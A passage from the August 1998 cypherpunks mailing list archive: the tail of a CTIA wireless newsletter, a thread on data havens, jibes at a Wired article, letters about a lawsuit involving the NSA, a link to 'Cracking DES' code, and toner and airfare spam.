HREF=3D"http://www2.nando.net/newsroom/ntn/info/080498/info3_19490.html"=
>NANDO.NET</A>)
- (<A =
HREF=3D"http://interactive.wsj.com/edition/current/articles/SB9021811822=
79792500.htm">WALL
ST. JOURNAL</A>) - (<A =
HREF=3D"http://www.usatoday.com/life/cyber/tech/ctd221.htm">USA
TODAY</A>) - (<A =
HREF=3D"http://dailynews.yahoo.com/headlines/technology/story.html?s=3Dz=
/reuters/980804/tech/stories/fcc_1.html">YAHOO</A>)</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>CellStar Says =
Securities
and Exchange Commission&nbsp;</FONT></FONT></B>&nbsp;
<BR><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>Probing Its =
"Compliance"</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">In its statement, CellStar said it =
believes
the SEC inquiry is primarily related to previously disclosed events =
occurring
in 1995 and 1996. In February 1996, the company lowered fourth quarter
earnings estimates on what it said was a bookkeeping error related to =
"double
counting of inventory.'' A class-action suit on behalf of shareholders
was filed against the company in April 1996 accusing the company of =
misrepresentation
of financial results. (<A =
HREF=3D"http://biz.yahoo.com/finance/980803/cellstar_c_1.html">YAHOO</A>=
)
- (<A =
HREF=3D"http://biz.yahoo.com/prnews/980803/tx_cellsta_1.html">CELLSTAR</=
A>)</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>LMDS Services to =
Businesses
to Exceed $6.5 Billion by 2007, According to Report by Pioneer =
Consulting&nbsp;</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">More than half of the revenues will =
be
generated by the small business market (fewer than 10 employees), where
a tremendous unmet demand exists for low-cost high-speed access =
services,
according to the report. (<A =
HREF=3D"http://biz.yahoo.com/prnews/980804/ma_lmds_re_1.html">YAHOO</A>)=
</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>Samsung =
Electronics Licenses
Unwired Planet Microbrowser&nbsp;</FONT></FONT></B>&nbsp;
<BR><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>for CDMA =
Handsets&nbsp;</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">Samsung will use Unwired Planet's =
microbrowser
to deliver enhanced functionality and features in mainstream handsets =
for
consumers, in addition to providing the wireless information access =
capabilities
that network operators can deploy. (<A =
HREF=3D"http://biz.yahoo.com/bw/980804/unwired_pl_1.html">YAHOO</A>)</FO=
NT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>Rutland, Vermont =
Town
Officials Assess Need&nbsp;</FONT></FONT></B>&nbsp;
<BR><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>for Cellular =
Antenna
Site</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">Planning commission officials =
explore
ways that cellular phone service can be offered while preserving the =
scenic
landscape.(<A =
HREF=3D"http://www.wow-com.com/results/professional/news/frameindex.cfm?=
articleid=3D3052">WOW-COM</A>)</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>Dobson =
Communications
Acquires Its Third California&nbsp;</FONT></FONT></B>&nbsp;
<BR><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>Cellular =
Property</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">Dobson buys California 7 Rural =
Service
Area (RSA) which includes Brawley, Calexico, and El Centro, Calif., =
from
Southern Cellular for $21 million.&nbsp; Dobson will market its =
wireless
service under the trade name AirTouch Cellular to the 143,400 =
population
of the area. (<A =
HREF=3D"http://www.wow-com.com/results/professional/news/frameindex.cfm?=
articleid=3D3067">WOW-COM</A>)</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>Popularity of =
Wireless
Phones Grows as Their Size Shrinks</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">Wireless phones are more convenient =
to
carry and use as manufacturers shrink them down to the size of a pack =
of
gum, load them up with new features and longer talk and standby times,
and offer better pricing. (<A =
HREF=3D"http://www.pioneerplanet.com/tech/">PIONEER
PLANET</A>)</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>CWA Members =
Authorize
Strikes if Negotiations Unsuccessful with Bell Atlantic, BellSouth and
U S WEST</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">Contracts with Bell Atlantic and =
BellSouth
expire August 8.&nbsp; Contract with U S WEST expires August 15.(<A =
HREF=3D"http://www.techweb.com/wire/story/reuters/REU19980803S0003">TECH=
WEB</A>)
- (<A =
HREF=3D"http://biz.yahoo.com/finance/980803/telecom_be_2.html">YAHOO</A>=
)
- (<A =
HREF=3D"http://biz.yahoo.com/prnews/980803/dc_cwa_us__1.html">YAHOO</A>)=
</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><BR></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><B><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D+1>Lucent Aims to =
Expand
in Asia&nbsp;</FONT></FONT></B></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica">Lucent will expand marketing its =
data
networking products and other communications network software in the =
Asia
Pacific region including Japan.&nbsp; Its target is to become the No. 1
player in the worldwide communications network business by 2001. (<A =
HREF=3D"http://www.news.com/News/Item/Textonly/0,25,24896,00.html?pfv">N=
EWS.COM</A>)
- (<A =
HREF=3D"http://biz.yahoo.com/finance/980804/lucent_hop_1.html">YAHOO</A>=
)</FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD>
<HR WIDTH=3D"100%"></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D-1>For additional news =
about
the wireless industry--including periodic news updates throughout the =
day--visit
<A =
HREF=3D"http://www.wow-com.com">http://www.wow-com.com.</A></FONT></FONT=
></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD>
<HR WIDTH=3D"100%"></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D-1>CTIA Daily News from =
WOW-COM
is transmitted weekdays, except for holidays. Visit us on the World =
Wide
Web at <A =
HREF=3D"http://www.wow-com.com/professional">http://www.wow-com.com/prof=
essional</A>.&nbsp;</FONT></FONT>&nbsp;

<P><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D-1>If you are not =
interested
in receiving the CTIA Daily News from WOW-COM, please send a message to
<A =
HREF=3D"mailto:unjoin-CTIA_Daily_News@um2.unitymail.com">unjoin-CTIA_Dai=
ly_News@um2.unitymail.com</A>.&nbsp;</FONT></FONT>&nbsp;

<P><B>***<FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D-1> The term =
"unjoin-CTIA_Daily_News@um2.unitymail.com"
must be listed in the TO section of the email.</FONT></FONT> =
***</B>&nbsp;

<P><FONT FACE=3D"Arial,Helvetica"><FONT SIZE=3D-1>Please Note: Some of =
the
links in today's news are time sensitive.&nbsp; Those links may not be
available as news changes throughout the day.&nbsp; Also, some news =
sources
may be subscription-based or require registration.</FONT></FONT></TD>

<TD></TD>
</TR>

<TR>
<TD></TD>

<TD>
<HR WIDTH=3D"100%"></TD>

<TD></TD>
</TR>
</TABLE></CENTER>

<CENTER>&nbsp;</CENTER>

</BODY>
</HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Tue, 4 Aug 1998 09:55:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: none
Message-ID: <150cb05934c46ba679428a6613874e66@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: "safe-haven"
Date: Tue, 04 Aug 1998 08:37:46 -0400

[...Initial message & Response...]

Mixmaster wrote:

> What characteristics make a jurisdiction (sovereign power) a good "safe-haven?"

Frederick Burroughs <riburr@shentel.net> responded:

Economically? In the view of former ARVN (south-vietnamese army) officer I used to
work with, government stability was a big requirement (anarchists take note).
Stability measured as the system of government, not holders of offices. Of course
it's easy to understand his position in light of his country's recent history.
Despite his foreign attributes, he was the source of some amusement and interesting
tidbits.

Government stability depends on many variables, but history can and is used by
those with holdings as a simple measure.

Then again, a good "safe haven" doesn't necessarily offer the biggest return (or
loss) on your investment.

[...end original...]

(I left the subject in the body of this message as these remailers sometimes clip the
subject field.)

Good comments. History is useful for measuring not only stability, but many facets.

Cases:

1.  Anguilla & Cate coming under pressure from Argentina. Would you say that Cate's
customer might have thought that a Carribean island might be a safe haven?

2.  Recent law suits over what people say about other people or companies. There doesn't
appear to be much security there for data between the u.s., canada and g.b.

Therefore, where can you find safety from intrusion by your host government, whether
they don't like what is on your server or another government or person doesn't like what
is on your computer?  Has anyone tackled this question in a studied way? (Yes, I know that
a number of good law firms would offer me an opinion for $350/hr.)

The only answer I can find, so far (and hence the question), is moving the data, which gets
expensive. It would seem that putting the data in a known safe haven in the first
place would be a better method of protecting it and then move it if assaulted.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Storey <cognitus@earthlink.net>
Date: Tue, 4 Aug 1998 11:45:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: The Unbreakable Data Lock
Message-ID: <35C757AB.935618C@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


http://www.wired.com/news/news/technology/story/13920.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <Andrew.Loewenstern@wdr.com>
Date: Tue, 4 Aug 1998 13:01:05 -0700 (PDT)
To: Richard Storey <cognitus@earthlink.net>
Subject: Re: The Unbreakable Data Lock
In-Reply-To: <35C757AB.935618C@earthlink.net>
Message-ID: <9808042001.AA12292@ch1d524iwk>
MIME-Version: 1.0
Content-Type: text/plain


> http://www.wired.com/news/news/technology/story/13920.html

It seems they are mighty short on clues at Wired these days...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Tue, 4 Aug 1998 13:23:32 -0700 (PDT)
To: Andrew Loewenstern <Andrew.Loewenstern@wdr.com>
Subject: Re: The Unbreakable Data Lock
In-Reply-To: <9808042001.AA12292@ch1d524iwk>
Message-ID: <199808042021.QAA06506@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <9808042001.AA12292@ch1d524iwk>, on 08/04/98 
   at 03:01 PM, Andrew Loewenstern <Andrew.Loewenstern@wdr.com> said:

>> http://www.wired.com/news/news/technology/story/13920.html

>It seems they are mighty short on clues at Wired these days...

You give them too much credit by assuming that they ever had any to start
with.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Windows with bullet-proof glass.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNcdu+o9Co1n+aLhhAQEVigQAmaHTHYWlPLQ2Z69kezaGSyoW2XU2vAIH
IeGOSXWuFbNfXrUTUVTRmNzzmgVCLnTk9WLHG0bN90CQB7L/EtbPzhCKV9qBPi1m
JwIa0/c1DiAU0xrCUZvQLIx51K74mFqrfov6ArIvPRox5HHVdpi8WrBctp+gjzyt
FkRdrhL55Rk=
=/lth
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 4 Aug 1998 14:48:40 -0700 (PDT)
To: gbroiles@netbox.com
Subject: Great Fascist Satan's ploys
Message-ID: <35C7808A.39AB@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 8/4/98 3:11 PM

J Orlin Grabbe
John Young

Morales and I met for lunch.

We formulated a plan of attack on the NEXT TARGET.

ABQ J Monday 8/13/98

  Fess Up, Clinton Friends, Foes Say

  Key Republican Says Lenience Is an Option

  By Robert L. Jackson
  Los Angeles Times

  WASHINGTON -

  [C]hairman Orrin Hatch of Utah said he believes Clinton could retract
  his denials of intimacy with Lewinsky and still survive in office,
provided
  there is no evidence of larger transgressions such as perjury or
obstruction
  of justice.
    "If he comes forth and tells it and does it in the right way and
there aren't
  a lot of other factors to cause the Congress to say this man is unfit
for the
  presidency and should be impeached, then I think the president would
have a 
  reasonable chance of getting through this," Hatch said of NBC's "Meet
the
  Press." ...

One of the Great Fascist Satan's ploys is to give a person bad advice
...
and hope they take it.  Bubba, we all guess, knows this TOO.

Morales and I figured out how to approach Hatch. 

The last attempt did not work.  http://www.jya.com/whp071598.htm

The statement

  No less can they forget how the west backed Saddam Hussein's 1980
invasion of Iran.

in Clinton Longs to "Make Iran His China" seen at
http://www.aci.net/kalliste/

appears a bit understated in view of
http://www.aci.net/kalliste/speccoll.htm
and http://caq.com/cryptogate.

I got a letter from US Attorney Mitchell today.  But I haven't opened
it.

Yesterday on the phone Mitchell I sensed that Mitchell had changed.  

Mitchell sounded sympathetic to what Morales' and I are doing.  

But she is a LAWYER so we are NOT counting on anything.

Let's all hope for settlement of the UNFORTUNATE matter before it gets
WORSE.

Later
bill


Monday 8/3/98 3:41 PM

FAX

Jan Elizabeth Mitchell
Assistant U.S. Attorney
U.S. Department of Justice
United States Attorney
District of New Mexico
Post Office Box 607
Albuquerque, NM 87103
505/346-7274
505/766-2868
FAX 505/346-7205

Dear Ms Mitchell:

Purpose of the fax is to 

1  review points covered in our 8/3/98 14:18 phone conversation
2  suggest settlement.

You phoned me today.

You told me that you planned to file a motion or response to the Tenth circuit's
request Morales and my response to the jurisdictional issue on the 21st of August.

I told you that this was premature on your part since we had moved for a second time
for an extension of time.

I told you also that this matter was now before congress.

You appeared to indicate to me that you were in the process of adding both Morales and
Minihan as named parties in this appeal.

You asked me if it would be agreeable to us if you filed a response to the Tenth circuit
21 days AFTER Morales and I filed our response to the Tenth circuit on the jurisdictional
issue.

I AGREED.

I spoke to Morales on the phone shortly after our phone conversation.

Arguing points of law before court clerks and judges who have outstanding criminal complaint
affidavits for crimes COMMITTED IN WRITING againtst them would be unproductive on Morales and my 
part.

Therefore, we will proceed to resolve the criminal conduct on the part of judges and court clerks
before we proceed further in this matter.

We will do this at the Congressional level.

Senate Judiciary Committe chairman Orrin Hatch, unfortunately, failed to properly process a valid
complaint on New Mexico district court chief judge John Conway in 1995.  
http://www.jya.com/whp071598.htm

Hatch's failure to properly respond in 1995, in large part, caused our current legal conflict with DIR NSA 
Minihan.

We foresee an unfortunate escalation of hostilities if this matter proceeds as it is.  

We do not wish this.

We seek settlement of the UNFORTUNATE matter at the earliest time.

We ask your and Congressional help to settle this UNFORTUNATE matter before it gets WORSE.

If I have made any essential material errors in reporting my impression of the contents of our conversation, 
then I would appreciate you giving your impression of possible errors.  

You can do this in the letter you said you would write to us.

Sincerely,


bill payne
13015 Calle de Sandias NE          	        
Albuquerque, NM 87111              	        

Distribution

Senate Judiciary Committee   e-mail
Arthur R Morales e-mail			





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 4 Aug 1998 16:12:15 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 4, 1998 (Update)
Message-ID: <199808042114.QAA31533@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




*******************************************************************
You may have received an earlier encoded version of the
CTIA Daily News from WOW-COM.  We apologize for
any inconvenience.

We experienced a technical malfunction that has been corrected.
*******************************************************************

==========================================

Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Storey <cognitus@earthlink.net>
Date: Tue, 4 Aug 1998 15:45:13 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: The Unbreakable Data Lock
In-Reply-To: <199808042021.QAA06506@domains.invweb.net>
Message-ID: <35C7753A.8B1015C7@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, but I don't recall giving them "credit."

William H. Geiger III wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <9808042001.AA12292@ch1d524iwk>, on 08/04/98
>    at 03:01 PM, Andrew Loewenstern <Andrew.Loewenstern@wdr.com> said:
> 
> >> http://www.wired.com/news/news/technology/story/13920.html
> 
> >It seems they are mighty short on clues at Wired these days...
> 
> You give them too much credit by assuming that they ever had any to start
> with.
> 
> - --
> - ---------------------------------------------------------------
> William H. Geiger III  http://www.openpgp.net
> Geiger Consulting    Cooking With Warp 4.0
> 
> Author of E-Secure - PGP Front End for MR/2 Ice
> PGP & MR/2 the only way for secure e-mail.
> OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
> - ---------------------------------------------------------------
> 
> Tag-O-Matic: OS/2: Windows with bullet-proof glass.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3a-sha1
> Charset: cp850
> Comment: Registered_User_E-Secure_v1.1b1_ES000000
> 
> iQCVAwUBNcdu+o9Co1n+aLhhAQEVigQAmaHTHYWlPLQ2Z69kezaGSyoW2XU2vAIH
> IeGOSXWuFbNfXrUTUVTRmNzzmgVCLnTk9WLHG0bN90CQB7L/EtbPzhCKV9qBPi1m
> JwIa0/c1DiAU0xrCUZvQLIx51K74mFqrfov6ArIvPRox5HHVdpi8WrBctp+gjzyt
> FkRdrhL55Rk=
> =/lth
> -----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ELarson100@aol.com
Date: Tue, 4 Aug 1998 15:49:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: stickers
Message-ID: <6d759c5b.35c78fe9@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Can you do a 5 color process?  4x4".  Price on 500,1000,1500




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 4 Aug 1998 18:48:48 -0700 (PDT)
To: j orlin grabbe <webmstr@rickohio.com
Subject: George Santyana, 1905 and the zeitgeist
Message-ID: <35C7B8F7.68A1@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 8/4/98 6:17 PM

J Orlin Grabbe

When I sent 

            The contemplation of things as they are,  
                without error or confusion,  
            without substitution or imposture,  
   is in itself a nobler thing than a whole harvest of invention.  
  
   Francis Bacon   

I had not seen the news.

I watched Dan Rather, ABC, and PBS.

I THINK I realized the importance of what you wrote at
http://www.aci.net/kalliste/apocalyp.htm
when I wrote at Tuesday 8/4/98 10:58 AM

  Larry Gilbert is our broker at Dain Rausher, formerly Rausher, Pierce
and Resfnes.
  
  I phoned Gilbert this morning to alert him to
http://www.aci.net/kalliste/apocalyp.htm

The about 300 point drop in the DJ.

I THINK we are doing LOTS OF THINKING.

We are THINKING ABOUT the zeitgeist.  

We do not cause what MAY happen.  We MAY only predict it.  

By THINKING and STUDYING HISTORY.

THINKING SLOWLY is the most important part.

                   Sitting Bull, whose Indian name 
                   was Tatanka Iyotake, was born in 
                   the Grand River region of 
                   present-day South Dakota in 
                   approximately 1831. His nickname 
                   was Hunkesi, meaning "Slow" 
                   because he never hurried and did 
                   everything with care.  
 
http://www.incwell.com/Biographies/SittingBull.html 

Morales and I are BOTH SLOW THINKERS.

Morales, his wife Becky said at about 17:30, also got a letter from US
attorney Mitchell.

Retired Washington State University econ chairman Robert F Wallace

       "Stupidity is difficult to underestimate." 

recommended I read The Great Crash by John Kenneth Galbraith.

I did a bit of searching on the web and found

  "Those who cannot remember the past are doomed to repeat it."
                                        -- George Santyana, 1905

http://rickohio.com/mag/articles/monica.htm

You and John Young http://www.jya.com/index.htm are riding the
zeitgeist, I THINK!

Morales and Payne may be on the zeitgeist too.
http://www.jya.com/whp071598.htm

Let's all hope for settlement of this unforunate matter. Before it gets
WORSE.

Best
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 4 Aug 1998 18:48:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cracking DES 5, 6, 7
Message-ID: <199808050148.VAA25162@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Chapters 5, 6 and 7, the US-export-prohibited code, and a great job 
of scanning and proofreading:


ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/cracking_DES/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aa1310@hotmail.com
Date: Tue, 4 Aug 1998 22:47:20 -0700 (PDT)
To: Friend@public.com
Subject: w63
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain








BENCHMARK PRINT SUPPLY
1091 REDSTONE LANE
ATLANTA GA 30338

CALL---->       770-399-0953   FOR TONER SUPPLIES ORDERS/PRICING ONLY  

CALL---->       770-399-5505   CUSTOMER SERVICE/SUPPORT ISSUES 
                 
CALL---->       770-399-5614    E-MAIL REMOVAL COMPLAINTS LINE

                                    
OUR  LASER PRINTER/FAX/COPIER TONER CARTRIDGE PRICES
NOW AS LOW AS $39 & UP. SPECIALS WEEKLY ON ALL LASER PRINTER
SUPPLIES. WE CARRY MOST ALL LASER PRINTER CARTRIDGES, FAX SUPPLIES
AND COPIER TONERS AT WAREHOUSE PRICES INCLUDING:

HEWLETT PACKARD SERIES 2/3/4/2P/4P/5P/4L/5L/3SI/4SI/5SI
IBM/LEXMARK OPTRA SERIES 4019/4029/4039/4049/4059
EPSON SERIES 2/1100/1500/6000/7000/8000
NEC SERIES 90/95
CANON COPIER PC SERIES INCLUDING 3/6RE/7/11/320/720/10/20/25 ETC...
HP FAX SERIES 700/720/5000/7000/FX1/FX2/FX3/FX4/FX5
CANON FAX ALL MODELS  
PRICES CHANGE WEEKLY PLEASE CALL TO GET THE MOST
RECENT PRICING/AVAILABILTY AND SPECIALS OF THE WEEK!!!!

PLEASE PLEASE PLEASE  MAKE NOTE OF THE FOLLOWING BEFORE YOU CALL:

-----> WE DO NOT HAVE CATALOGS OR PRICE LISTS BECAUSE OUR PRICES CHANGE WEEKLY!!
-----> WE DO NOT FAX QUOTES OR PRICES BECAUSE OUR ORDER LINE IS NOT SET UP  TO DO THAT
-----> WE DO NOT SELL  TO  RESELLERS OR BUY FROM DISTRIBUTERS
-----> WE DO NOT CARRY : BROTHER -MINOLTA-KYOSERA- PANASONIC - XEROX - FUJITSU - OKIDATA - SHARP!!
-----> WE DO NOT CARRY ANY COLOR PRINTER SUPPLIES!!!!!    
-----> WE DO NOT CARRY DESKJET/INKJET OR BUBBLEJET SUPPLIES!!!!                    

NEW,NEW,NEW $10 MAIL IN REBATE ON SELECTED  CARTRIDGES
SIMPLY ORDER YOUR NEW CARTRIDGE, WHEN IT ARRIVES MAIL BACK                        
YOUR REBATE CERTIFICATE WITH ANY USED CARTRIDGE FOR INSTANT CREDIT

WE ACCEPT ALL MAJOR CREDIT CARDS OR COD ORDERS
CORPORATE ACCOUNTS AVAILABLE WITH APPROVED CREDIT
ALL PACKAGES SHIPPED UPS GROUND UNLESS SPECIFIED OTHERWISE


 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aa1310@hotmail.com
Date: Wed, 5 Aug 1998 03:06:16 -0700 (PDT)
To: Friend@public.com
Subject: w68
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain








BENCHMARK PRINT SUPPLY
1091 REDSTONE LANE
ATLANTA GA 30338

CALL---->       770-399-0953   FOR TONER SUPPLIES ORDERS/PRICING ONLY  

CALL---->       770-399-5505   CUSTOMER SERVICE/SUPPORT ISSUES 
                 
CALL---->       770-399-5614    E-MAIL REMOVAL COMPLAINTS LINE

                                    
OUR  LASER PRINTER/FAX/COPIER TONER CARTRIDGE PRICES
NOW AS LOW AS $39 & UP. SPECIALS WEEKLY ON ALL LASER PRINTER
SUPPLIES. WE CARRY MOST ALL LASER PRINTER CARTRIDGES, FAX SUPPLIES
AND COPIER TONERS AT WAREHOUSE PRICES INCLUDING:

HEWLETT PACKARD SERIES 2/3/4/2P/4P/5P/4L/5L/3SI/4SI/5SI
IBM/LEXMARK OPTRA SERIES 4019/4029/4039/4049/4059
EPSON SERIES 2/1100/1500/6000/7000/8000
NEC SERIES 90/95
CANON COPIER PC SERIES INCLUDING 3/6RE/7/11/320/720/10/20/25 ETC...
HP FAX SERIES 700/720/5000/7000/FX1/FX2/FX3/FX4/FX5
CANON FAX ALL MODELS  
PRICES CHANGE WEEKLY PLEASE CALL TO GET THE MOST
RECENT PRICING/AVAILABILTY AND SPECIALS OF THE WEEK!!!!

PLEASE PLEASE PLEASE  MAKE NOTE OF THE FOLLOWING BEFORE YOU CALL:

-----> WE DO NOT HAVE CATALOGS OR PRICE LISTS BECAUSE OUR PRICES CHANGE WEEKLY!!
-----> WE DO NOT FAX QUOTES OR PRICES BECAUSE OUR ORDER LINE IS NOT SET UP  TO DO THAT
-----> WE DO NOT SELL  TO  RESELLERS OR BUY FROM DISTRIBUTERS
-----> WE DO NOT CARRY : BROTHER -MINOLTA-KYOSERA- PANASONIC - XEROX - FUJITSU - OKIDATA - SHARP!!
-----> WE DO NOT CARRY ANY COLOR PRINTER SUPPLIES!!!!!    
-----> WE DO NOT CARRY DESKJET/INKJET OR BUBBLEJET SUPPLIES!!!!                    

NEW,NEW,NEW $10 MAIL IN REBATE ON SELECTED  CARTRIDGES
SIMPLY ORDER YOUR NEW CARTRIDGE, WHEN IT ARRIVES MAIL BACK                        
YOUR REBATE CERTIFICATE WITH ANY USED CARTRIDGE FOR INSTANT CREDIT

WE ACCEPT ALL MAJOR CREDIT CARDS OR COD ORDERS
CORPORATE ACCOUNTS AVAILABLE WITH APPROVED CREDIT
ALL PACKAGES SHIPPED UPS GROUND UNLESS SPECIFIED OTHERWISE


 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qui78@lsi.usp.br (guyrmo)
Date: Wed, 5 Aug 1998 03:33:54 -0700 (PDT)
To: qui78@lsi.usp.br
Subject: Low AirFares--Cheaper than Airlines--Free AirFare Alert Service
Message-ID: <199808051502UAA10896@deremuv.educ.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



TravelNews keeps on-line travellers updated on Fare Wars, cruise and 
vacation specials, and other travel-related news.  To enroll in this 
FREE Email service, please see end of message.

Dear Client,  Special Preferred AirFares now available by 
phone.....Airfare outlook for the rest of 1998.....

Our Preferred Fares are now available by phone.  These special 
AirFares are lower than the Airlines themselves and lower than travel 
agencies.  We currently offer Preferred Fares with Delta, Northwest, 
Continental, United, and American (Caribbean only).  Call us for the 
best rates for travel in the US, Canada, the Caribbean, Europe, 
Central and South America, and more !!  800-672-1672  (9am-6pm EST)
**  Fully Bonded Airline Ticket supplier, serving clients worldwide 
since 1991.  **

(rates are discounts off lowest published fare by above carriers, 
must be purchased at least 7 days in advance and include a Saturday 
night stay, subject to availability)

You'll never pay regular rates again!!   800-672-1672  (9am-6pm EST)

Airfare Outlook for 1998......Most airlines continue to report record 
booking levels which will continue the trend of higher fares that we 
predicted at the beginning of this year.  Even though many carriers 
did offer sporadic "sales fares", the discounts were generally 
smaller and the "fare wars" fewer.  It is even more important to 
monitor fares closely during the 2nd half of 1998 and especially 
important to  BUY EARLY  !!  Remember that low fares for Holiday 
travel (Labor Day, Thanksgiving, Christmas) are currently available 
but will no doubt be selling out much sooner this year because demand 
will be higher.  If you wait too long to buy tickets, you could pay 
up to 50% more.

** Did you know that we have lower fares than on-line booking !! **
** Most transactions on-line take up to 40 minutes, ours take only 
5-10 minutes!!  **   800-672-1672   (9am-6pm EST)

